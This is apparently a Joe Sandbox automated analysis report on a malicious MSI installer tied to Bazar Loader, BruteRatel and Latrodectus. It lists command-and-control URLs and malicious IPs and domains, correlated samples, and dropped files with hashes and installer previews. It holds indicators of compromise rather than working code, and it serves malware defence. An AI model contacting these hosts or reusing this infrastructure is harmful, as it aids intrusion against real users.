                                                                                                                                                            unknown
                                                                                                                                                            https://tiguanin.com:8041/jrundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://r10.i.lencr.org/0rundll32.exe, 00000006.00000003.2769645862.0000016AD28B2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2868000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788292595.0000016AD2853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2441139413.0000016AD28BE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2848000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000009.00000003.2277712034.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1792832688.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://isomicrotich.com/Texplorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://tiguanin.com:8041/bazar.phpjrundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://bazarunet.com:8041/admin.phpIrundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://www.pollensense.com/explorer.exe, 00000009.00000000.1791266554.00000000071A4000.00000004.00000001.00020000.00000000.sdmpfalse
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | isomicrotich.com | European Union | 13335 | CLOUDFLARENETUS | true
82.115.223.39 | greshunka.com | Russian Federation | 209821 | MIDNET-ASTK-TelecomRU | true
80.78.24.30 | tiguanin.com | Cyprus | 37560 | CYBERDYNELR | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1525187
Start date and time: 2024-10-03 20:43:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: das.msi
Detection: MAL
Classification: mal100.troj.evad.winMSI@9/24@7/3
                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                          • Successful, ratio: 99%
                                                                                                                                                                                                          • Number of executed functions: 34
                                                                                                                                                                                                          • Number of non-executed functions: 218
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .msi
                                                                                                                                                                                                          • Override analysis time to 240s for rundll32
                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 93.184.221.240
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, time.windows.com, wu-b-net.trafficmanager.net, wu.azureedge.net, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                          • VT rate limit hit for: das.msi
Time | Type | Description
14:44:17 | API Interceptor | 7469566x Sleep call for process: rundll32.exe modified
14:45:36 | API Interceptor | 5079465x Sleep call for process: explorer.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                              Document-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                vierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                  dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                    Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                      0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                        DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                          80.78.24.30e664858e8b8ff1ac08f6dd812a68d65d05a704262fa13862538c3c45.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • fredlomberhfile.com:2351/lpfdokkq
                                                                                                                                                                                                                          s5YgOFFmFK.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                          • smockalifatori.com/
                                                                                                                                                                                                                          CiMXn78mMb.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                          • skayfingertawr.com/
                                                                                                                                                                                                                          Scan_06-28_INV__70.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                          • hloyagorepa.com/
                                                                                                                                                                                                                          Scan_06-28_INV__70.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                          • hloyagorepa.com/
                                                                                                                                                                                                                          Scan_06-28_INV__10.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                          • hloyagorepa.com/
                                                                                                                                                                                                                          Scan_06-28_INV__10.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                          • hloyagorepa.com/
                                                                                                                                                                                                                          05387199.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                          • shoterqana.com/
                                                                                                                                                                                                                          08778399.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                          • shoterqana.com/
                                                                                                                                                                                                                          Contract_March_23_INV#305.exeGet hashmaliciousIcedIDBrowse
                                                                                                                                                                                                                          • aoureskindzet.com/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                          • 104.26.6.103
                                                                                                                                                                                                                          wSVyC8FY.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                          • 172.67.19.24
                                                                                                                                                                                                                          https://secured.viewonlineportalshared.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                                          • 104.18.95.41
                                                                                                                                                                                                                          RfeGlbGe3t.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                                                                                                                          • 1.2.3.4
                                                                                                                                                                                                                          MIDNET-ASTK-TelecomRUvierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                                          Document-18-33-08.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                                          Document-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                                          vierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                                          dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                                          Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                                          0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                                          DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                          • 82.115.223.39
                                                                                                                                                                                                                          failure.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 82.115.223.234
                                                                                                                                                                                                                          web3Interface.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 82.115.223.234
                                                                                                                                                                                                                          CYBERDYNELRvierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                          • 80.78.24.30
                                                                                                                                                                                                                          Document-18-33-08.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                          • 80.78.24.30
                                                                                                                                                                                                                          ponos.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                                                          • 80.78.28.83
                                                                                                                                                                                                                          SecuriteInfo.com.Heuristic.HEUR.AGEN.1313656.13208.30309.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                                                          • 80.78.28.83
                                                                                                                                                                                                                          firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 46.246.44.223
                                                                                                                                                                                                                          SecuriteInfo.com.Malicious_Behavior.SB.8937.18140.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 80.78.24.250
                                                                                                                                                                                                                          67gneXXY2P.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 46.246.43.211
                                                                                                                                                                                                                          attach#6081-18-03-2024.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 198.167.201.153
                                                                                                                                                                                                                          bin.elfGet hashmaliciousPwnRig MinerBrowse
                                                                                                                                                                                                                          • 80.78.24.30
                                                                                                                                                                                                                          http://5d1d57a7.28cb0c8c5155aeac03abaf42.workers.dev/?qrc=cHN0b2VsdGluZ0Btb29nLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 80.78.24.136
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1vierm_soft_x64.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          Document-18-33-08.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          c84f2f8df965727bcdcc4de6beecf70c960ef7c885e77.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          0a839761915d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          sqlite.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          Activator by URKE v2.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                          • 188.114.97.3
Match: C:\Users\user\AppData\Roaming\vierm_soft_x64.dll
• Filename: Document-18-33-08.js, Detection: malicious, Threat Name: Bazar Loader, BruteRatel, Latrodectus
Match: C:\Windows\Installer\MSI9E30.tmp
• Filename: Document-18-33-08.js, Detection: malicious, Threat Name: Bazar Loader, BruteRatel, Latrodectus
• Filename: Document-19-51-48.js, Detection: malicious, Threat Name: Bazar Loader, BruteRatel, Latrodectus
• Filename: dsa.msi, Detection: malicious, Threat Name: Bazar Loader, BruteRatel, Latrodectus
• Filename: Document-19-27-03.js, Detection: malicious, Threat Name: Bazar Loader, BruteRatel, Latrodectus
• Filename: DLPAgent.msi, Detection: malicious, Threat Name: Bazar Loader, BruteRatel, Latrodectus
• Filename: Document-21-41-00.js, Detection: malicious, Threat Name: Bazar Loader, BruteRatel, Latrodectus
• Filename: CITROEN.msi, Detection: malicious, Threat Name: Bazar Loader, BruteRatel
• Filename: DLPAgent.msi, Detection: malicious, Threat Name: Bazar Loader, BruteRatel, Latrodectus
• Filename: 6ylVfr0IVw.msi, Detection: malicious, Threat Name: Latrodectus
• Filename: Document-19-25-24.js, Detection: malicious, Threat Name: Latrodectus
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):1220
                                                                                                                                                                                                                                                Entropy (8bit):5.687740847816095
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:5OgJsrvgTU68NWdhW/nHN9RpUzgWg2FP9yWDhiSQ8vWfLK:MusrIn8NWdhWPHN9bH6P5D8S/r
                                                                                                                                                                                                                                                MD5:34E54C7DE1B74CD070864D8BA9419FEE
                                                                                                                                                                                                                                                SHA1:4040CA427DD9F1D6EFF121E12AE3309559C46EC6
                                                                                                                                                                                                                                                SHA-256:E566A36591D3454C54BEAA64C8667510EE8F8673455564E150F688FB5878CB99
                                                                                                                                                                                                                                                SHA-512:BCCFED97EC90703EF8DAE93E634B05E338EC4EDC2EF9AEAC8AA350EA66FA2051913B6772DA1D5DA5DAD13D741A2AFC568D79494BB2F11F2FA6882326E7916662
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:...@IXOS.@.....@.uCY.@.....@.....@.....@.....@.....@......&.{68C54E68-8D6C-454F-B2BE-2596868E8867}..GloryDory..das.msi.@.....@...C.@.....@........&.{26C6701E-5BA5-48FD-87C5-16BC3575B429}.....@.....@.....@.....@.......@.....@.....@.......@......GloryDory......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{68C54E68-8D6C-454F-B2BE-2596868E8867}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{68C54E68-8D6C-454F-B2BE-2596868E8867}.@......&.{2B132521-4E05-4E2E-93F1-6029E2DAB7E0}&.{68C54E68-8D6C-454F-B2BE-2596868E8867}.@........CreateFolders..Creating folders..Folder: [1]#.=.C:\Users\user\AppData\Roaming\OrbitalMast LLC\GloryDory\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..#.C:\Users\user\AppData\Roaming\....5.C:\Users\user\AppData\Roaming\vierm_soft_x64.dll....WriteRegistryValues..Writing system registry
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):767488
                                                                                                                                                                                                                                                Entropy (8bit):7.207925663165308
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:/h/M5nsxW5fFcrGn7Q21Svj07MGpmeSM6q4LWYv1AoMJPPyogk31OkRK1OKeQeq:/rD+JPPn8kM1Oej
                                                                                                                                                                                                                                                MD5:B1CA25F5BB4EDD293B3711C77EB99A6F
                                                                                                                                                                                                                                                SHA1:178BBA8686EA329B884A652FE0F8A0AE0C53D367
                                                                                                                                                                                                                                                SHA-256:97A6331239D451D7DFE15BFE17DE8B419DF741AE68BACD440808F8B8D3F99B8A
                                                                                                                                                                                                                                                SHA-512:D5A282A8F81E117B79616C44A260D89C7FEE06F4AC1387675BC79C3BD7599A5D49FBE3D8FB3D4D42EEA81A17564ABC2D42288BC2DC468D1B16ED633BA421B32D
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                • Filename: Document-18-33-08.js, Detection: malicious
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {26C6701E-5BA5-48FD-87C5-16BC3575B429}, Number of Words: 10, Subject: GloryDory, Author: OrbitalMast LLC, Name of Creating Application: GloryDory, Template: ;1033, Comments: This installer database contains the logic and data required to install GloryDory., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1669120
                                                                                                                                                                                                                                                Entropy (8bit):7.187836999350755
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:5Sj3YhW8zBQSc0ZnSKSZKumZr7A+zafUWM1q:oYY0ZnQK/A7fQ
                                                                                                                                                                                                                                                MD5:3CB6B99B20930AC0DBADC10899DC511E
                                                                                                                                                                                                                                                SHA1:570C4AB78CF4BB22B78AAC215A4A79189D4FA9ED
                                                                                                                                                                                                                                                SHA-256:EA1792F689BFE5AD3597C7F877B66F9FCF80D732E5233293D52D374D50CAB991
                                                                                                                                                                                                                                                SHA-512:AEDF58EA01D59CCE191CB9C0F83DBDBF7E3E8F049C764B577D6A957CB5229C50DDA7EC6760CA43AD4DBDB085AE02B07BC818F69CA08373243019AF6683E4931C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):446944
                                                                                                                                                                                                                                                Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                • Filename: Document-18-33-08.js, Detection: malicious
                                                                                                                                                                                                                                                • Filename: Document-19-51-48.js, Detection: malicious
                                                                                                                                                                                                                                                • Filename: dsa.msi, Detection: malicious
                                                                                                                                                                                                                                                • Filename: Document-19-27-03.js, Detection: malicious
                                                                                                                                                                                                                                                • Filename: DLPAgent.msi, Detection: malicious
                                                                                                                                                                                                                                                • Filename: Document-21-41-00.js, Detection: malicious
                                                                                                                                                                                                                                                • Filename: CITROEN.msi, Detection: malicious
                                                                                                                                                                                                                                                • Filename: DLPAgent.msi, Detection: malicious
                                                                                                                                                                                                                                                • Filename: 6ylVfr0IVw.msi, Detection: malicious
                                                                                                                                                                                                                                                • Filename: Document-19-25-24.js, Detection: malicious
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):446944
                                                                                                                                                                                                                                                Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):446944
                                                                                                                                                                                                                                                Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):446944
                                                                                                                                                                                                                                                Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):401059
                                                                                                                                                                                                                                                Entropy (8bit):6.591907261694784
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:HMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1q:HMvZx0FlS68zBQSncb4ZPQTpAjZxqO1q
                                                                                                                                                                                                                                                MD5:D8CC5A9CEE0E7798D7D78433BFDA7BE9
                                                                                                                                                                                                                                                SHA1:08486D248BB3DADA72346E72A9489263BA55F0E2
                                                                                                                                                                                                                                                SHA-256:741A8EA3A2A75E11AAE640AFD9E9302D5270DF96FC3814741DCBBB8E62ED1AE6
                                                                                                                                                                                                                                                SHA-512:484BB7E5D84CD494487CC23383AFD8C46B30D4FF18506C42E01773385021D3BB892E1C3ECC9D30F369D35D1D3ABC34859DF1A11FE9B0CDB78344A1BBFE44597A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...@IXOS.@.....@.uCY.@.....@.....@.....@.....@.....@......&.{68C54E68-8D6C-454F-B2BE-2596868E8867}..GloryDory..das.msi.@.....@...C.@.....@........&.{26C6701E-5BA5-48FD-87C5-16BC3575B429}.....@.....@.....@.....@.......@.....@.....@.......@......GloryDory......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}=.C:\Users\user\AppData\Roaming\OrbitalMast LLC\GloryDory\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}..01:\Software\OrbitalMast LLC\GloryDory\Version.@.......@.....@.....@......&.{2B132521-4E05-4E2E-93F1-6029E2DAB7E0}5.C:\Users\user\AppData\Roaming\vierm_soft_x64.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".=.C:\Users\user\AppData\Roaming\OrbitalMast LLC\GloryDory\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):399328
                                                                                                                                                                                                                                                Entropy (8bit):6.589290025452677
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                                                                                                                                                                                                                MD5:B9545ED17695A32FACE8C3408A6A3553
